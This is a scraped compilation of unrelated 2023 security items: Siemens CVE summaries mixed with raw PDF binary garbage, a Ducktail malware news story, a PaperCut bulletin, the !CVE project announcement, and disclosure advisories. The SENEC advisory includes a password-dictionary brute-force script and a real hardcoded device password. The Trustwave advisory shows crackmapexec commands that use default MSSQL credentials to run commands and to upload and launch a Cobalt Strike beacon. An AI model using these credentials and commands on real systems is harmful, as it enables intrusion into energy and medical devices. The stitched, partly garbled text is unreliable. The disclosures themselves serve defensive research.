A vulnerability has been identified in COMOS (All versions). The affected application lacks proper access controls in making the SQLServer connection. This could allow an attacker to query the database directly to access information that the user should not have access to.

%PDF-1.5 %���� 52 0 obj << /Length 3071 /Filter /FlateDecode >> stream xڵZYs�8~���#U��A��œc\*��I�G���y�%�f�&�O��v��%ZQV�\[$H4�}|�&�����ד\_�NN�3��j�gW�3CI���XK3����SrY�y��/�I��|�\]�L%E������M��͜�׃���j�l^�����W�~;ysu���P�6\[>�|���V��%¦�'���L\*A�p\]�.O�}B�P�w@�3J��}4SI��-I��Hb%詧 e �iP��ق c)}�+S�0~�⊀�ڵ�\`Xz A�~�����t(���l��2��3N�a�K"��\`�3Mdj!aA�i��}$f���q�i�-�|��e��fW�(��#�\`��FBԖ�O��.�JRT�s�!�b\\0�t�s,� ˆ��z����>v�Q�Yp0@�\\("���?l\]�(�e�u�c���\_BTI%O8�b�؂I\\� �J����6��s���a�Y\*�\]��\*L�8Oi��7�:̖,e�GF�伏��~�WP���%��!�-�52\`�J,I'#�BkF�������0d�E#�a{� ������b�h�'.>�?�ć�VKN���vA��.d�$���X�/�|��̙��\]%s���Ç{���D�ѽ��g��Z��r��e=�l��dUn�l�&��97����|�m��j��a���h�s0�2��W�1HQ���L��r��\_f۸���\*��\_׷�w��,��X���u�\*�d\_�YY�����L)/��Ϊ��}��N����F��2�lZ�ͺ,|-��Q٠���K��v$ ��oʓ��\]�d��9��;}�������gn�A�;Y&��e��W����tc�}�s�0�u{g#�Pi\[^�6���By�K�<����:�VMT rn�yx�S6\*�Ð���>\_���"��,�Vu�b�{0�/�9�7�8Ტ�|H����JK� -�)�\\�6����޾}����� D�-�搕\`��Dp�\]1Q�(��y$&Ԉ������\_\]\]NH\`�q"X���$�$���"1m�h~��=���b�s��9�paT�c�Ie��\_����ջ��O�,f>S�m�xik��s�&��I4��) ���� Kx����n6�� �Pf���8��Y$��g���#�WQǑ�h\*�3H���R�.B{wA)��j��r ��ƅ�\]���J�����mJ�=R!�Jr����§�X��������8�=�."h�)0

CVE-2023-46601

A vulnerability has been identified in Siemens OPC UA Modelling Editor (SiOME) (All versions < V2.8). Affected products suffer from a XML external entity (XXE) injection vulnerability. This vulnerability could allow an attacker to interfere with an application's processing of XML data and read arbitrary files in the system.

%PDF-1.5 %���� 52 0 obj << /Length 2658 /Filter /FlateDecode >> stream xڵZKs�8��W�6T�ƓR{�ؚ�g��k��L%s\`$��DjIʞ��m

CVE-2023-46590

The Vietnamese threat actors behind the Ducktail stealer malware have been linked to a new campaign that ran between March and early October 2023, targeting marketing professionals in India with an aim to hijack Facebook business accounts.
"An important feature that sets it apart is that, unlike previous campaigns, which relied on .NET applications, this one used Delphi as the programming

The Vietnamese threat actors behind the Ducktail stealer malware have been linked to a new campaign that ran between March and early October 2023, targeting marketing professionals in India with an aim to hijack Facebook business accounts.

"An important feature that sets it apart is that, unlike previous campaigns, which relied on .NET applications, this one used Delphi as the programming language," Kaspersky said in a report published last week.

Ducktail, alongside Duckport and NodeStealer, is part of a cybercrime ecosystem operating out of Vietnam, with the attackers primarily using sponsored ads on Facebook to propagate malicious ads and deploy malware capable of plundering victims' login cookies and ultimately taking control of their accounts.

Such attacks primarily single out users who may have access to a Facebook Business account. The fraudsters then use the unauthorized access to place advertisements for financial gain, perpetuating the infections further.

In the campaign documented by the Russian cybersecurity firm, potential targets looking for a career change are sent archive files containing a malicious executable that's disguised with a PDF icon to trick them into launching the binary.

Doing so results in the malicious file saving a PowerShell script named param.ps1 and a decoy PDF document locally to the "C:\\Users\\Public" folder in Windows.

"The script uses the default PDF viewer on the device to open the decoy, pauses for five minutes, and then terminates the Chrome browser process," Kaspersky said.

The parent executable also downloads and launches a rogue library named libEGL.dll, which scans the "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs" and "C:\\ProgramData\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\" folders for any shortcut (i.e., LNK file) to a Chromium-based web browser.

The next stage entails altering the browser's LNK shortcut file by suffixing a "\--load-extension" command line switch to launch a rogue extension that masquerades as the legitimate Google Docs Offline add-on to fly under the radar.

The extension, for its part, is designed to send information about all open tabs to an actor-controlled server registered in Vietnam and hijack the Facebook business accounts.

**Google Sues Scammers for Using Bard Lures to Spread Malware**

The findings underscore a strategic shift in Ducktail's attack techniques and come as Google filed a lawsuit against three unknown individuals in India and Vietnam for capitalizing on the public's interest in generative AI tools such as Bard to spread malware via Facebook and pilfer social media login credentials.

"Defendants distribute links to their malware through social media posts, ads (i.e., sponsored posts), and pages, each of which purport to offer downloadable versions of Bard or other Google AI products," the company alleged in its complaint.

"When a user logged into a social media account clicks the links displayed in Defendants' ads or on their pages, the links redirect to an external website from which a RAR archive, a type of file, downloads to the user's computer."

The archive files include an installer file that's capable of installing a browser extension adept at pilfering victims' social media accounts.

Earlier this May, Meta said it observed threat actors creating deceptive browser extensions available in official web stores that claim to offer ChatGPT-related tools and that it detected and blocked over 1,000 unique URLs from being shared across its services.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Vietnamese Hackers Using New Delphi-Powered Malware to Target Indian Marketers

This vulnerability allows local attackers to escalate privileges on affected installations of PaperCut NG. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
The specific flaw exists within the pc-pdl-to-image process. The process loads an executable from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.

**AVAILABLE TO CUSTOMERS ON:**

   

**Security Issues Addressed****Privilege escalation vulnerability (CVE-2023-6006)**

(also known as PIE-547).

We want to thank the security researchers at Trend Micro (Amol Dosanjh of Trend Micro and Michael DePlante of Trend Micro Zero Day Initiative) who reported: “This vulnerability allows local attackers to escalate privileges on affected installations of PaperCut NG. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.”

A potential exploit would require **all** of the following to be true:

*   PaperCut NG/MF Application Server (earlier than version 23.0.1) is running on a Windows platform (macOS and Linux are not impacted by this vulnerability).
*   Malicious actor has write access to the Application Server’s local hard drive.
*   Malicious actor has the ability to execute low-privileged code on the target server.
*   Print Archiving feature is enabled, _without_ GhostTrap installed.

This vulnerability has been rated with a CVSS score of **6.4**: (CVSSv3 Vector: AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H )

Note: Trend Micro are looking to publicly disclose additional information about this. While the Trend Micro advisory may only mention PaperCut NG, we have confirmed that this impacts both PaperCut NG and PaperCut MF (see Impacted Product Status table below).

**A note about the timing of this bulletin**

We publicly released PaperCut MF and NG version 23.0.1 on 31st October, 2023. This security bulletin and information about CVE-2023-6006 was then published on 14th November 2023. This delay was so that customers can have a head-start on upgrading to a non-vulnerable version.

We have now retroactively added the release note for PIE-547 into the 23.0.1 release notes , and published this security bulletin including details of the manual mitigation.

**Impacted Product Status**

 

**CVE-2023-6006**  
_(Fix ID: PIE-547)_

What versions are **VULNERABLE**?

PaperCut NG/MF Application Servers where all of the following are true:

*   PaperCut NG/MF Application Server (earlier than version 23.0.1) is running on a Windows platform (macOS and Linux are not impacted by this vulnerability).
*   Malicious actor has write access to the Application Server’s local hard drive.
*   Malicious actor has the ability to execute low-privileged code on the target server.
*   Print Archiving feature is enabled, _without_ GhostTrap installed.
    

What versions are **FIXED**?

Application Servers running version 23.0.1 or later

Which PaperCut MF or NG components **are** impacted?

Application Servers **are** impacted.

Which PaperCut components or products are **NOT** impacted?

*   PaperCut NG/MF site servers
*   PaperCut NG/MF secondary servers (Print Providers)
*   PaperCut NG/MF Direct Print Monitors (Print Providers)
*   PaperCut MF MFD Embedded Software
*   PaperCut Hive
*   PaperCut Pocket
*   Print Deploy
*   Mobility Print
*   PaperCut User Client software
*   PaperCut Multiverse
*   Print Logger
*   Job Ticketing

  
Note that this only impacts Application Servers running on Windows platforms. Linux or macOS platforms are **not** impacted.

Are there any other **mitigations** available?

Yes. If you’re unable to immediately update to 23.0.1 or later, there are other mitigation options listed below under How do I mitigate this vulnerability?

**FAQs**

Q Where can I get the upgrade?

The **Check for updates** button in the PaperCut NG/MF admin interface allows customers to download the latest version of PaperCut NG or MF. You will find this at **PaperCut NG/MF Admin interface > About > Version info > Check for updates**.

You can also find your PaperCut partner or reseller information on the Help tab (or About tab in older versions) on the PaperCut Web admin interface.

Alternatively, direct downloads are available on the upgrade page . It’s easy to identify your edition of PaperCut - it’s on the **About** tab and in the footer of your PaperCut Web admin login.

Q How do I tell if my Application Server is at risk?

**All** of the following need to be true for your Application Server to be at risk:

*   PaperCut NG/MF Application Server (earlier than version 23.0.1) is running on a Windows platform (macOS and Linux are not impacted by this vulnerability).
*   Malicious actor has write access to the Application Server’s local hard drive.
*   Malicious actor has the ability to execute low-privileged code on the target server.
*   Print Archiving feature is enabled, _without_ GhostTrap installed.

Q How do I tell if I am using the Print Archiving feature?

In the PaperCut NG/MF admin interface, go to **Options > General > Print Archiving**.

*   If the **Enable Print Archiving** checkbox is _not_ checked, then you are not using Print Archiving, and this vulnerability cannot be exploited.
*   If the **Enable Print Archiving** checkbox _is_ checked, then you are using Print Archiving and the vulnerability could potentially be exploited if all of the other points above in “How do I tell if my Application Server is at risk” are true.

Q If I am using Print Archiving, how do I tell if I have installed GhostTrap?

In the PaperCut NG/MF admin interface, go to **Options > General > Print Archiving**. In the Status box, check to see what is listed next to the **Viewing supported** for line:

*   If **Viewing supported for** lists e.g. EMF, PCL5, PCL6, PDF, PostScript, XPS then GhostTrap is installed, and this vulnerability cannot be exploited.
*   If **Viewing supported for** only lists e.g. PDF, PostScript then GhostTrap is not installed, and this vulnerability could be exploited, if all of the other points above in How do I tell if my Application Server is at risk? are true.

Q How do I mitigate this vulnerability?

If all of the points under How do I tell if my Application Server is at risk? are true, there are several options to mitigate this vulnerability:

1.  Upgrade your Application Server to version 23.0.1 or later (see Where can I get the upgrade? above).
    
2.  If you’re unable to upgrade to version 23.0.1 or later, and turning off Print Archiving is an option, you can switch that off under **Options > General > Print Archiving**, then uncheck **Enable Print Archiving**.
    
3.  If you’re unable to upgrade to version 23.0.1 or later, and you need to continue using Print Archiving, then ensure ghostTrap is installed in C:\Program Files\GhostTrap. See Set up Print Archiving (Step 1) for more information.
    
4.  If you’re unable to upgrade to version 23.0.1 or later, and you need to continue using Print Archiving, and you don’t want to install GhostTrap, then you can create a directory on your Application Server file system: C:\gs\bin and remove **write permissions** for all accounts except administrators.
    
5.  If none of the above suit your environment, you can download a fixed version of the pc-pdl-to-image.exe and replace it on your Application Server. See How do I manually replace the pc-pdl-to-image.exe binary? below for more information.
    

Q How do I manually replace the pc-pdl-to-image.exe binary?

**Only** use this fix if you have looked through the section How do I mitigate this vulnerability above, and Option 5 is the only option you’re able to implement.

**Note**: if you are using PaperCut NG or MF version 23.0.1 or later, you do **not** need to perform these steps - you already have the latest patched version.

1.  Download the updated (patched) pc-pdl-to-image.exe binary from the PaperCut CDN: https://cdn.papercut.com/files/general/pc-pdl-to-image.zip .
    
2.  Unzip pc-pdl-to-image.zip to get the pc-pdl-to-image.exe binary. (If you wish to verify the SHA256 checksum this is: 5be6a8a817a3fc30fb4a56bff527b51a452d8d84ae1d3d5632d83d2674bcbbb6).
    
3.  In [App Server install directory]\server\bin\win (e.g. C:\\Program Files\\PaperCut MF\\server\\bin\\win) rename pc-pdl-to-image.exe to pc-pdl-to-image.bak
    
4.  Copy the downloaded (patched) pc-pdl-to-image.exe to [App Server install directory]\server\bin\win\.
    

_Note 1_: A service restart is **not** required for this change to take effect.

_Note 2_: If you subsequently upgrade to any other version earlier than 23.0.1 (e.g. if you apply this mitigation on 22.1.3, then you upgrade from 22.1.3 to 22.1.4) you will need to re-apply this mitigation - since the replaced binary will be re-written with an unpatched one.

_Note 3_: If you are upgrading to 23.0.1 or later, you will **not** need to apply this manual mitigation since the fix is included in 23.0.1 and later.

_Note 4_: The full list of fixes for the patched executable include:

*   Fix for CVE-2023-39471 (the vulnerability described above) \[PIE-547\] (fixed in PaperCut NG and MF version 23.0.1).
*   Fix for an issue that caused thumbnail image generation to fail for archived PostScript spool files. \[PIE-216\] (fixed in PaperCut NG and MF version 22.0.9).

Q What products are impacted by these vulnerabilities?

See the Impacted Product Status section above for a detailed list.

Q I am running a 20.x, 21.x or 22.x version - is there an updated build containing the fix?

No - since this vulnerability can be mitigated using multiple options (see How do I mitigate this vulnerability? above) this fix will only be included in 23.0.1 and later.

Q Is there anything I should be aware of before applying the upgrade?

Yes, potentially. If you are upgrading from a version prior to 22.1.1 you should read the upgrade checklist for 22.1.1 . If you’re already on version 22.1.1 or later, you don’t need to check through this again.

Q I am running an old version. Do I need to upgrade to a prior version before upgrading to 23.0.1?

No. This release includes all previous fixes released, and you can upgrade directly to this release from any previous version of PaperCut NG/MF.

**Security notifications**

“How do I sign-up for paperCut’s security mailing list?”

In order to get timely notifications of security news (including security related fixes or vulnerability information) please subscribe to our security notifications list via our Security notifications sign-up form. If you’re a sys admin or if you look after PaperCut product implementations at your organization, this list will help you be amongst the first to hear of any security related news or updates.

**Updates**

**Date**

**Update/Action**

31st October, 2023 (AEDT)

Publicly released PaperCut NG/MF version 23.0.1 (contains vulnerability fixes identified above).

14th November, 2023 (AEDT)

Published this Security bulletin.

14th November, 2023 (AEDT)

Published CVE-2023-6006.

CVE-2023-6006: PaperCut NG/MF Security Bulletin (November 2023)

The !CVE Project is an initiative to track and identify security issues that are not acknowledged by vendors but still are important for the security community.

=======  
Mission  
=======

The mission of !CVE (read not CVE) is to track, identify and provide a  
common space for !vulnerabilities that are not acknowledged by vendors but  
still are serious security issues.

This project was presented a few days ago at Black Hat Toronto 2023 [1]  
and will also be presented next week at DeepSec 2023 [2].

===  
Why  
===

According to MITRE's CNA rules section 7.1:

       "CNAs are left to their own discretion to determine whether  
        something is a vulnerability."[3]

This poses a clear conflict of interest, since the same vendor is the one  
deciding whether or not an issue is a vulnerability and therefore whether a  
CVE is assigned to their own product or not.

==============  
What is a !CVE  
==============

    - A common place for !vulnerabilities (read not vulnerabilities)

    - Security issues not covered by the traditional CVE.

    - An identifier following common naming starting with an exclamation  
      mark(!) Example: !CVE-2023-0001

============================  
How to request a new !CVE ID  
============================

The !CVE Project is alive and assigning !CVE-IDs for security issues that  
present an advantage for an attacker.

You can request a !CVE ID at: https://notcve.org/form.php

======================  
How !CVEs are assigned  
======================

A panel will review !CVE requests and if qualifies, a new !CVE number will  
be assigned and details will be publicly available.

==============================  
How to access to !CVEs details  
==============================

Using the search engine at https://notcve.org or a direct link to the !CVE  
entry. For example, the first ever !CVE is available at:  
https://notcve.org/view.php?id=!CVE-2023-0001

The search engine combines information from multiple sources and also  
searches for regular CVEs in all fields from all sources. For example to  
search by credit we can obtain CVE discovered by Google Project Zero:

https://notcve.org/search.php?query=Google+Project+Zero

=========================  
What qualifies for a !CVE  
=========================

Examples that qualifies for a !CVE:  
-----------------------------------  
    - A security issues that is not acknowledged by the vendor as a  
      vulnerability.

    - A security issue acknowledged by a vendor as technically correct  
      but outside their threat model.

    - A notified security issue that has not been assigned a CVE after  
      90 days.

    - A published security issue without an assigned CVE.

Examples that do NOT qualify for a !CVE:  
----------------------------------------  
    - A software defect with no impact on security.

    - A generic security issue, you need to list one or more  
      devices/software affected with your finding.

    - Well known attacks to unencrypted channels to obtain  
      credentials: Telnet, FTP, etc.

    - You can read the FAQ [4] for more examples.

In short, we see the !CVE Project as a great initiative to track and  
identify security issues that are not acknowledged by vendors but still are  
important for the security community.

==========  
References  
==========

[1]   
https://www.blackhat.com/sector/2023/arsenal/schedule/index.html#cve-a-new-platform-for-unacknowledged-cybersecurity-vulnerabilities-36144

[2] https://www.deepsec.net/speaker.html#PSLOT667

[3] https://cve.mitre.org/cve/cna/CNA_Rules_v3.0.pdf

[4] https://notcve.org/faq.html

---  
!CVE Team

[ A PGP key is available for encrypted communications at  
https://notcve.org/contact.html ]

Not CVE Announcement

EnBw SENEC Legacy Storage Box versions 1 through 3 appear to suffer from a hardcoded credential vulnerability.

Advisory ID:               Ph0s-2023-003  
Product:                   EnBw - SENEC legacy storage box: V1-V3  
Manufacturer:              SENEC - a part of EnBw  
Affected Version(s):       Firmware: all (as of 2023-06-19)  
Tested Version(s):         current  
Vulnerability Type:        CWE-307: Improper Restriction of Excessive 

                           Authentication Attempts  
                           CWE-798: Use of Hard-coded Credentials

Risk Level: 

CVSS v3.1 Vector:  
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)

Manufacturer Risk Level Rating:  
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:H/RL:U/RC:C  
Overall CVSS Score: 8.6

Solution Status:           Fixed  
Manufacturer Notification: 2023-06-05  
Public Disclosure:         2023-11-01  
CVE Reference:             CVE-2023-39168  
Author of Advisory:        Ph0s[4], R0ckE7

********************************************************************************

Overview:  
Foreword: 

This vulnerability was reported to the enbw-cert. we would like to  
thank enbw-cert for taking care of the vulns and patch the systems.  
we decided to publish when most of the reported vulns are patched  
to make sure nobody is harmed when 3rdparys exploit the mentioned vulns. 

About Senec:  
We are SENEC

We have been the EnBW energy independence experts since 2018 – but we have  
put our heart and soul into guiding customers on the route to independence  
since SENEC was founded in 2009. Our passion lies in actively promoting the  
energy transition with innovative ideas and pioneering products. And, 

because we don’t do things by halves, our unwavering ambition is to create  
integrated solutions that enable you to enjoy the highest possible degree  
of independence and sustainability through self-generation of solar 

electricity.

About SENEC Home:

SENEC.Home: The smart electricity storage device for your home

SENEC.Home is the heart of the your sustainable, affordable supply of solar  
electricity. The smart battery storage device stores excess electricity 

generated by your PV system so that you can use it when you need it – such as  
when your household’s energy consumption rises in the evening, or on rainy days  
when your PV system generates less power.

********************************************************************************

Vulnerability Details:

Based on the previously identified hard-coded username in CVE-2023-39167 and  
CVE-2023-39168 all technical requirements were met to target the password. 

Since the username installateur is quite straightforward in the sense of 

guessable, it was decided to perform a dictonary-type brute force attack. 

For this purpose, all related PDF documents were downloaded to create a password  
list specifically tailored to SENEC.Inverter. 

Source of the Documents: https://senec.com/au/company/downloads

********************************************************************************

Proof of Concept (PoC):

The attack consists of the following steps:

1. parse the documents :  
import argparse  
import glob  
import string  
import fitz

def get_senec_password(pdf_directory, pwd_prefix, pwd_suffix):  
    pdf_text = ""  
    for file in glob.glob(f"{pdf_directory}/*.pdf"):  
        pdf = fitz.open(file)  
        for page in pdf:  
            pdf_text += page.get_text()

    pdf_words = set(  
        [word.strip(string.punctuation) for word in pdf_text.split() if word.strip(string.punctuation).isalnum()]  
    )  
    senec_password = set(  
        [f"{pwd_prefix}{word}{pwd_suffix}" for word in pdf_words if not word.isnumeric()]  
    )

    with open("senec-password.txt", mode="w", encoding="utf-8") as fd:  
        fd.write('\n'.join(senec_password))

if __name__ == '__main__':  
    parser = argparse.ArgumentParser(description="Generate SENEC.Inverter password dictionary")  
    parser.add_argument("-d", "--pdf-directory", type=str, action="store", default="pdf", required=False,  
                        help="pdf storage location")  
    parser.add_argument("-p", "--pwd-prefix", type=str, action="store", default="Senec", required=False,  
                        help="password prefix")  
    parser.add_argument("-s", "--pwd-suffix", type=str, action="store", default="", required=False,  
                        help="password suffix")  
    args = parser.parse_args()  
    get_senec_password(args.pdf_directory, args.pwd_prefix, args.pwd_suffix)

2. work with the output:  
The Python script extracts all words from all PDF documents and allows to add a prefix  
and/or suffix to generate passwords according to the pattern {prefix}{word}{suffix} ,  
such as the following:  
***** cut *******  
Senecmoribundity  
SenecCleaning  
Senecdusts  
Senecclinical  
Senecaggregation  
Senecstubborn  
Senecstorages  
SenecDecommissioning  
SenecInstall  
Senecmany  
***** cut ********

3) use the list within burpsuite  
The password lists were then used in Burp Suite Professional, a tool 

specifically designed for web application security testing, to perform an 

automated brute force attack.  
The list shown above as an excerpt with the prefix Senec and no suffix was 

finally successful in executing the attack.  
It could be determined that the password "SenecInstall" is valid for all  
SENEC.Inverter devices.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:  
Patched by Manufacturer  
(Rolled out until September 11, 2023)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-06-01: Vulnerability discovered  
2023-06-05: Vulnerability reported to manufacturer  
2023-09-11: Patch rollout by manufacturer to affected devices  
2023-11-01: Public disclosure of vulnerability

************************************************************************

Researcher:  
Ph0s[4], R0ckE7

************************************************************************

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0  
URL: https://creativecommons.org/licenses/by/4.0/deed.en

EnBw SENEC Legacy Storage Box Hardcoded Credentials

Natus NeuroWorks and SleepWorks before 8.4 GMA3 utilize a default password of xltek for the Microsoft SQL Server service sa account, allowing a threat actor to perform remote code execution, data exfiltration, or other nefarious actions such as tampering with data or destroying/disrupting MSSQL services.

Trustwave SpiderLabs Security Advisory TWSL2023-006: Default MSSQL Database Password in Natus NeuroWorks EEG Software Published: 11/07/2023 Version: 1.0 Vendor: Natus https://natus.com/products-services/natus-neuroworks-eeg-software Product: NeuroWorks EEG Software Version affected: Prior to 8.4 GMA3 Product description: The Natus NeuroWorks platform simplifies the process of collecting, monitoring, trending and managing data for routine EEG testing, ambulatory EEG, long-term monitoring, ICU monitoring, and research studies. NeuroWorks systems are scalable to meet the needs of private practice clinics, hospitals, large teaching facilities and EEG service providers. Natus NeuroWorks is a cutting-edge, single solution for EEG, LTM, ICU, Sleep, and Research Studies, exhibiting an advanced software for clinical excellence. The Microsoft SQL-based NeuroWorks database is a powerful tool that simplifies the management of patient, study and laboratory data. Filter studies by date, status, diagnosis, or use any built-in editable field to create custom filters for your unique needs. Track outcomes and filter by statistical indices that are calculated in the reports. The distributed database automatically updates system settings across the network to ensure that all workstations have current lab settings. Finding 1: Default Password for Natus NeuroWorks EEG Software MSSQL Database \*\*\*\*\*Credit: John Jackson of Trustwave Natus NeuroWorks EEG Software utilizes their own custom MSSQL configuration and database for the management of medical research studies connected to the testing and monitoring software implemented via the Natus NeuroWorks platform. By default, the MSSQL service utilizes the administrative username 'sa' coupled with the password 'xltek'. An attacker can utilize the default credentials to access stored sensitive data or perform administrative functions and MSSQL queries. In addition, an attacker on the local network could potentionally leverage the credentials to access the file system of the server and perform read, write, and execution functions on the disk. Natus recommends against changing the default password as it will disable MigrateDB's ability to authenticate silently in instances of new virtual database creation. Proof of Concept/Summary: While the instance of default credentials is properly documented within the "XL Security Site Administrator Reference" guide, Natus specifically recommends against changing the default credentials. The document specifically states: "Each instance of SQL Server also has a system administrator username ('sa'). The default password is 'xltek'; however it can be changed for each instance of SQL Server. We strongly recommend using the default password for local SQL Server instances". Natus recommends against changing the password, because of their MigrateDB function. The document goes on to say: "MigrateDB is also called silently when a new 'virtual database' is created through Natus Database - XLDB. In this case, MigrateDB will not prompt the user for the 'sa' password. If the password for 'sa' has been altered on the local machine from its default, the creation of a new virtual server will fail". They do however recommend a workaround, which is to change the password back to xltek while performing new virtual database creation, and then once again change back to the default. ## Running the command 'whoami' using default credentials └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'whoami' MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[+\] Executed command via mssqlexec MSSQL SERVERNAME 1433 SERVERNAME -------------------------------------------------------------------------------- MSSQL SERVERNAME 1433 SERVERNAME nt authority\\network service ## Writing a cobalt strike beacon to a local windows directory └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth --put-file /home/mrhacking/Desktop/cobaltstrike/payloads/armsvc.exe C:\\\\Temp\\\\Events\\\\armsvc.exe MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Copy /home/mrhacking/Desktop/cobaltstrike/payloads/armsvc.exe to C:\\Temp\\Events\\armsvc.exe MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Size is 409088 bytes MSSQL SERVERNAME 1433 SERVERNAME \[+\] File has been uploaded on the remote machine └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'dir C:\\Temp\\Events\\' MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[+\] Executed command via mssqlexec MSSQL SERVERNAME 1433 SERVERNAME -------------------------------------------------------------------------------- MSSQL SERVERNAME 1433 SERVERNAME Volume in drive C is Windows MSSQL SERVERNAME 1433 SERVERNAME Volume Serial Number is A050-B8DA MSSQL SERVERNAME 1433 SERVERNAME Directory of C:\\Temp\\Events MSSQL SERVERNAME 1433 SERVERNAME 06/15/2023 02:54 PM

. MSSQL SERVERNAME 1433 SERVERNAME 06/15/2023 02:54 PM

.. MSSQL SERVERNAME 1433 SERVERNAME 06/23/2023 02:31 PM 409,088 armsvc.exe MSSQL SERVERNAME 1433 SERVERNAME 1 File(s) 409,088 bytes MSSQL SERVERNAME 1433 SERVERNAME 2 Dir(s) 34,903,302,144 bytes free ## Triggering the cobalt strike beacon └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'cmd.exe /c start C:\\Temp\\Events\\armsvc.exe' MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[+\] Executed command via mssqlexec MSSQL SERVERNAME 1433 SERVERNAME None ## Beacon command execution proof beacon> sleep 0 \[\*\] Tasked beacon to become interactive \[+\] host called home, sent: 16 bytes beacon> getuid \[\*\] Tasked beacon to get userid \[+\] host called home, sent: 8 bytes \[\*\] You are NT AUTHORITY\\NETWORK SERVICE beacon> run systeminfo \[\*\] Tasked beacon to run: systeminfo \[+\] host called home, sent: 28 bytes \[+\] received output: Host Name: SERVERNAME OS Name: Microsoft Windows 10 Enterprise 2016 LTSB OS Version: 10.0.14393 N/A Build 14393 OS Manufacturer: Microsoft Corporation OS Configuration: Member Workstation OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: XXXXX-XXXXX-XXXXX-XXXXX Original Install Date: 6/6/2017, 5:39:30 PM System Boot Time: 6/17/2023, 2:07:18 PM System Manufacturer: Dell Inc. System Model: OptiPlex 5050 System Type: x64-based PC Processor(s): 1 Processor(s) Installed. \[01\]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~3312 Mhz BIOS Version: Dell Inc. 1.11.1, 11/29/2018 Windows Directory: C:\\windows System Directory: C:\\windows\\system32 Boot Device: \\Device\\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 8,051 MB Available Physical Memory: 5,344 MB Virtual Memory: Max Size: 16,243 MB Virtual Memory: Available: 13,210 MB Virtual Memory: In Use: 3,033 MB Page File Location(s): C:\\pagefile.sys Domain: REDACTED FOR PRIVACY Logon Server: N/A Hotfix(s): 6 Hotfix(s) Installed. \[01\]: KB4013418 \[02\]: KB4033631 \[03\]: KB4049411 \[04\]: KB4103729 \[05\]: KB4132216 \[06\]: KB4103720 Network Card(s): 1 NIC(s) Installed. \[01\]: Intel(R) Ethernet Connection (5) I219-V Connection Name: LAN DHCP Enabled: Yes DHCP Server: X.X.X.X IP address(es) \[01\]: X.X.X.X Hyper-V Requirements: VM Monitor Mode Extensions: Yes Virtualization Enabled In Firmware: Yes Second Level Address Translation: Yes Data Execution Prevention Available: Yes Vendor Response: The vendor has revised the Administrator Reference document by discontinuing the endorsement of default password usage. Instead, the vendor strongly recommends that all users change default SQL credentials. This requires to update the software to leverage the Credentials Cache feature, introduced in version 8.4 GMA3. The technical service team will provide the revised documentation to customers on request, and in the future, it will be integrated into the Neuroworks software installation package. The vendor has additionally released a security advisory regarding this threat. You can access the security bulletin at this link: https://natus.bynder.com/m/7cd3bcca88e446d4/original/NeuroWorks-SleepWorks-Product-Security-Bulletin.pdf Remediation Steps: Upgrade to GMA3 version 8.4 or a higher version to enable the credential cache feature and update the default SQL credentials. Revision History: 06/27/2023 - Trustwave disclosed vulnerability to vendor 07/07/2023 - Vendor provides Trustwave with preliminary version of the updated documentation 07/18/2023 - Vendor has provided Trustwave with remediation plan 10/20/2023 - Vendor publishes security bulletin 11/07/2023 - Advisory published References 1. https://natus.bynder.com/m/7cd3bcca88e446d4/original/NeuroWorks-SleepWorks-Product-Security-Bulletin.pdf About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers 